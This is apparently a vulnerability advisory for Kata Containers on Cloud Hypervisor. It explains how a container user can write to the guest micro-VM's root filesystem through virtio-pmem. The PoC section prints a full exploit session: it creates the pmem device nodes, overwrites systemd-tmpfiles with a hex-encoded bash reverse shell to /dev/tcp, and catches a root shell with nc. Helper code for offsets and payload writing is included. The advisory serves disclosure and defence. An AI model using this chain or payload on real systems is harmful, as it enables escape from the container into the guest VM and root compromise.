PT-2026-20875 · Go · github.com/kata-containers/kata-containers/src/runtime
Published 2026-02-19 · Updated 2026-02-19
CVSS v4.0: 5.2 (Medium)
Vector: AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
Summary
An issue in Kata with Cloud Hypervisor allows a user of the container to modify the file system used by the guest micro VM. This ultimately achieves arbitrary code execution as root in that VM. The current understanding is that this does not impact the security of the host, or of other containers/VMs running on that host. (Note that arm64 QEMU lacks NVDIMM read-only support. Until upstream QEMU gains this capability, it is believed that a guest write could reach the image file.)
Details
Linux virtio-pmem
The virtio-pmem probe path always registers the region as a generic pagemap that supports asynchronous flushes, but it never marks the region as read-only. Only the ND_REGION_PAGEMAP and ND_REGION_ASYNC bits are set before the region is created. As a result, nd_region->ro always stays cleared and the block device is left writable.

Later, pmem_attach_disk() wires the region into the block layer with full read/write semantics: the block device operations call pmem_do_write(), which performs cache-flushed memcpy operations directly into the host-provided shared memory window. nvdimm_check_and_set_ro() would set the disk read-only if the region had been flagged as such. Because virtio-pmem never sets that flag, the helper becomes a no-op.

Cloud Hypervisor virtio-pmem
Setting discard_writes=on causes the file backing the virtio-pmem device to be opened read-only and mapped with MAP_PRIVATE rather than MAP_SHARED. With this combination, the guest can modify its private copy of the mapped pages, but those modifications never propagate back to the underlying file. The guest (and the Cloud Hypervisor process) still reads the modified data, because it lives in the private copy of the mapping. Write-then-read sequences therefore appear to succeed even though nothing is persisted. Once the mapping is dropped or the VM is restarted, the copy-on-write changes disappear and the backing file is left unchanged.

Kata /dev/pmem0
Kata boots each pod/VM by DAX-mapping a read-only guest image from the host into the VM. It then tells the guest kernel to mount the resulting /dev/pmem* device as its root filesystem. Because DAX maps the backing file directly into guest memory, the hypervisor has no way to intercept or reject individual stores. A container with sufficient permissions can therefore open /dev/pmem0 and observe its own writes until the VM is rebooted or the cache is dropped.

PoC
Putting all this together, a user of a container can modify the guest OS filesystem. The user does not need to be privileged: CAP_SYS_ADMIN is not needed, but CAP_MKNOD is. By replacing libraries or binaries, the user achieves arbitrary code execution outside the container, as root in the guest VM. This requires computing the offset of each target file within the device. That computation needs the partition start sector, the sector size in bytes, the filesystem block size, and the physical block index of the file.

To achieve execution in the guest, I replaced /usr/bin/systemd-tmpfiles with a connect-back shell to localhost. The systemd timers end up executing it 15 minutes after boot.
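The offset arithmetic behind the "Resolution" block of the PoC output can be sketched as follows. This is a minimal illustration, not the author's pmem.py. The `Layout` type and the `absolute_offset` helper are hypothetical names. The sketch also assumes the file's physical block number has already been looked up; the advisory uses debugfs for this step.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Layout:
    """Device/filesystem geometry (hypothetical container for the PoC's inputs)."""
    partition_start_sectors: int  # first sector of /dev/pmem0p1 inside /dev/pmem0
    sector_size: int              # bytes per sector
    block_size: int               # filesystem block size in bytes


def absolute_offset(layout: Layout, file_offset: int, physical_block: int) -> int:
    """Translate a byte offset inside a file into a byte offset inside the whole device.

    `physical_block` must be the filesystem block holding logical block
    file_offset // block_size of the file (assumed already resolved, e.g. via debugfs).
    """
    partition_start = layout.partition_start_sectors * layout.sector_size
    intra_block = file_offset % layout.block_size  # position inside that block
    return partition_start + physical_block * layout.block_size + intra_block


if __name__ == "__main__":
    layout = Layout(partition_start_sectors=2048, sector_size=512, block_size=4096)
    # Values reported by the PoC for /usr/bin/systemd-tmpfiles.
    off = absolute_offset(layout, file_offset=0, physical_block=40668)
    print(off, hex(off))
```

The PoC reports a 2048-sector partition start, 512-byte sectors, 4096-byte blocks and physical block 40668. With these values the sketch prints `167624704 0x9fdc000`. Here 1048576 + 40668 × 4096 = 167624704, which matches the `09fdc000` address in the hexdump further down.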
I use debugfs, which does not require mounting privileges, to work directly with the filesystem on /dev/pmem0p1. This gives the absolute offset of the target file within the device.

For a simpler PoC, just use dd to write something into /dev/pmem0, then observe that dd reads it back until the change is discarded.

root@ab5392da44ce:~# mknod /dev/pmem0 b 259 0
root@ab5392da44ce:~# mknod /dev/pmem0p1 b 259 1
root@ab5392da44ce:~# python pmem.py --file /usr/bin/systemd-tmpfiles --write --pattern 23212f62696e2f626173680a62617368202d69203e26202f6465762f7463702f3132372e302e302e312f34343320303e26310a6578697420300a
=== Resolution ===
Partition device: /dev/pmem0p1 (pmem0p1)
Partition start (sectors): 2048
Sector size (bytes): 512
Partition start (bytes): 1048576
Filesystem block size: 4096
File path: /usr/bin/systemd-tmpfiles
File offset (bytes): 0
Logical block index: 0
Intra-block offset: 0
Physical block index: 40668
→ Absolute pmem offset: 167624704
[*] Raw read (64 bytes at 167624704):
09fdc000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
09fdc010 03 00 3e 00 01 00 00 00 20 66 00 00 00 00 00 00 |..>..... f......|
09fdc020 40 00 00 00 00 00 00 00 48 82 01 00 00 00 00 00 |@.......H.......|
09fdc030 00 00 00 00 40 00 38 00 0d 00 40 00 20 00 1f 00 |....@.8...@. ...|
[+] Wrote 58 bytes at absolute offset 167624704. Verifying...
09fdc000 23 21 2f 62 69 6e 2f 62 61 73 68 0a 62 61 73 68 |#!/bin/bash.bash|
09fdc010 20 2d 69 20 3e 26 20 2f 64 65 76 2f 74 63 70 2f | -i >& /dev/tcp/|
09fdc020 31 32 37 2e 30 2e 30 2e 31 2f 34 34 33 20 30 3e |127.0.0.1/443 0>|
09fdc030 26 31 0a 65 78 69 74 20 30 0a |&1.exit 0.|
root@ab5392da44ce:~# nc -lvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:44880.
bash: cannot set terminal process group (329): Inappropriate ioctl for device
bash: no job control in this shell
root@localhost:/#
root@localhost:/# ps auxw
ps auxw
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 17280 1920 ? Ss 16:16 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 16:16 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 16:16 0:00 [pool_workqueue_release]
root 4 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-rcu_gp]
root 5 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-sync_wq]
root 6 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-slub_flushwq]
root 7 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-netns]
root 9 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/0:0H-events_highpri]
root 10 0.0 0.0 0 0 ? I 16:16 0:01 [kworker/0:1-events_power_efficient]
root 12 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-mm_percpu_wq]
root 13 0.0 0.0 0 0 ? I 16:16 0:00 [rcu_tasks_trace_kthread]
root 14 0.0 0.0 0 0 ? S 16:16 0:00 [ksoftirqd/0]
root 15 0.0 0.0 0 0 ? I 16:16 0:00 [rcu_sched]
root 16 0.0 0.0 0 0 ? S 16:16 0:00 [rcu_exp_par_gp_kthread_worker/1]
root 17 0.0 0.0 0 0 ? S 16:16 0:00 [rcu_exp_gp_kthread_worker]
root 18 0.0 0.0 0 0 ? S 16:16 0:00 [migration/0]
root 19 0.0 0.0 0 0 ? S 16:16 0:00 [cpuhp/0]
root 20 0.0 0.0 0 0 ? S 16:16 0:00 [kdevtmpfs]
root 21 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-inet_frag_wq]
root 22 0.0 0.0 0 0 ? S 16:16 0:00 [kauditd]
root 23 0.0 0.0 0 0 ? S 16:16 0:00 [oom_reaper]
root 24 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-writeback]
root 25 0.0 0.0 0 0 ? S 16:16 0:00 [kcompactd0]
root 26 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-cryptd]
root 27 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-kblockd]
root 28 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/0:1H]
root 29 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/u256:1-events_unbound]
root 30 0.0 0.0 0 0 ? S 16:16 0:00 [kswapd0]
root 31 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-xfsalloc]
root 32 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-xfs_mru_cache]
root 33 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/u257:0]
root 34 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-kthrotld]
root 36 0.0 0.0 0 0 ? S 16:16 0:00 [irq/25-ACPI:Ged]
root 37 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-nfit]
root 38 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/0:2-virtio_vsock]
root 39 0.0 0.0 0 0 ? S 16:16 0:00 [hwrng]
root 40 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/u256:2-events_unbound]
root 41 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-vfio-irqfd-cleanup]
root 42 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-mld]
root 43 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-ipv6_addrconf]
root 81 0.0 0.0 0 0 ? S 16:16 0:00 [jbd2/pmem0p1-8]
root 82 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/R-ext4-rsv-conversion]
root 99 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/u256:3]
root 105 0.0 0.0 62032 2568 ? Ssl 16:16 0:02 /usr/bin/kata-agent
chrony 117 0.0 0.0 10692 540 ? S 16:16 0:02 /usr/sbin/chronyd -F 1
chrony 120 0.0 0.0 10560 460 ? S 16:16 0:00 /usr/sbin/chronyd -F 1
root 122 0.2 1.0 44876 31556 ? S 16:16 0:11 python -m server
message+ 124 0.0 0.0 8120 384 ? Ss 16:16 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 129 0.0 0.0 0 0 ? S 16:16 0:00 [cpuhp/1]
root 130 0.0 0.0 0 0 ? S 16:16 0:00 [migration/1]
root 131 0.0 0.0 0 0 ? S 16:16 0:00 [ksoftirqd/1]
root 132 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/1:0-mm_percpu_wq]
root 133 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/1:0H-events_highpri]
root 134 0.0 0.0 0 0 ? I< 16:16 0:00 [kworker/1:1H]
root 142 0.0 0.0 5400 2220 pts/0 Ss 16:16 0:00 bash -l
root 145 0.0 0.0 0 0 ? I 16:16 0:00 [kworker/1:1]
root 323 0.0 0.1 13212 3448 pts/0 R+ 16:17 0:00 nc -lvp 443
root 329 0.0 0.0 4780 256 ? Ss 16:31 0:00 /bin/bash /usr/bin/systemd-tmpfiles --clean
root 330 0.0 0.0 5048 512 ? S 16:31 0:00 bash -i
root 377 0.0 0.0 7480 256 ? R 17:33 0:00 ps auxw
root@localhost:/#
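The `--pattern` argument in the PoC is the hex encoding of a 58-byte bash connect-back script. The sketch below does three things:

- It decodes that pattern.
- It reproduces the write-then-verify step ("Wrote 58 bytes ... Verifying...") using `os.pwrite` and `os.pread`.
- The same write-then-read-back shape is what the simpler dd-based check exercises.

This is an illustration under stated assumptions, not the advisory's pmem.py. `write_and_verify` is a hypothetical helper, and a temporary file stands in for /dev/pmem0 so the sketch runs on any Unix host.

```python
import os
import tempfile

# The --pattern argument from the PoC command line, split for readability.
PATTERN = (
    "23212f62696e2f626173680a"                  # "#!/bin/bash\n"
    "62617368202d69203e26202f6465762f7463702f"  # "bash -i >& /dev/tcp/"
    "3132372e302e302e312f34343320303e26310a"    # "127.0.0.1/443 0>&1\n"
    "6578697420300a"                            # "exit 0\n"
)
PAYLOAD = bytes.fromhex(PATTERN)


def write_and_verify(path: str, offset: int, data: bytes) -> bytes:
    """Write `data` at an absolute byte offset, then read the same range back.

    Hypothetical helper; not taken from the advisory's tooling.
    """
    fd = os.open(path, os.O_RDWR)
    try:
        written = os.pwrite(fd, data, offset)
        if written != len(data):
            raise OSError(f"short write: {written} of {len(data)} bytes")
        return os.pread(fd, len(data), offset)
    finally:
        os.close(fd)


if __name__ == "__main__":
    # Stand-in for /dev/pmem0: an empty temporary file (pwrite extends it).
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        echoed = write_and_verify(path, 4096, PAYLOAD)
        print(PAYLOAD.decode(), end="")
        print(f"wrote {len(PAYLOAD)} bytes, read-back matches: {echoed == PAYLOAD}")
    finally:
        os.unlink(path)
```

On the real device, the read-back only shows that the guest sees its own write. As described above, the write lives in Cloud Hypervisor's private copy of the mapping.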
Impact
Container-to-guest micro VM escape (no escape to the host; the overwritten image is not persisted)
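The lack of persistence comes from the MAP_PRIVATE mapping that Cloud Hypervisor uses when discard_writes=on. The minimal sketch below reproduces that copy-on-write behaviour in user space with Python's `mmap` module. It assumes a Unix host, where `mmap.ACCESS_COPY` maps the file MAP_PRIVATE with read/write protection. A small temporary file stands in for the guest image, and `demo_private_mapping` is a hypothetical helper.

```python
from __future__ import annotations

import mmap
import os
import tempfile


def demo_private_mapping(original: bytes, patch: bytes) -> tuple[bytes, bytes]:
    """Write `patch` through a private (copy-on-write) mapping of a read-only file.

    Returns (bytes seen through the mapping, bytes still on disk).
    """
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(original)
        # Open read-only, mirroring the discard_writes=on behaviour described above.
        with open(path, "rb") as f:
            # On Unix, ACCESS_COPY uses MAP_PRIVATE with PROT_READ | PROT_WRITE.
            with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_COPY) as m:
                m[: len(patch)] = patch      # the write "succeeds" (copy-on-write)
                seen = m[: len(original)]    # later reads see the private copy
        with open(path, "rb") as f:
            on_disk = f.read()               # the backing file is untouched
        return seen, on_disk
    finally:
        os.unlink(path)


if __name__ == "__main__":
    seen, on_disk = demo_private_mapping(b"\x7fELF" + b"\x00" * 12, b"#!/bin/bash\n")
    print("through the mapping:", seen)
    print("on disk:            ", on_disk)
```

Reads through the mapping return the patched bytes, while the file keeps its original ELF header. This is the write-then-read illusion described under the Cloud Hypervisor virtio-pmem details.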
Fix
Incorrect Permission
Affected Products
github.com/kata-containers/kata-containers/src/runtime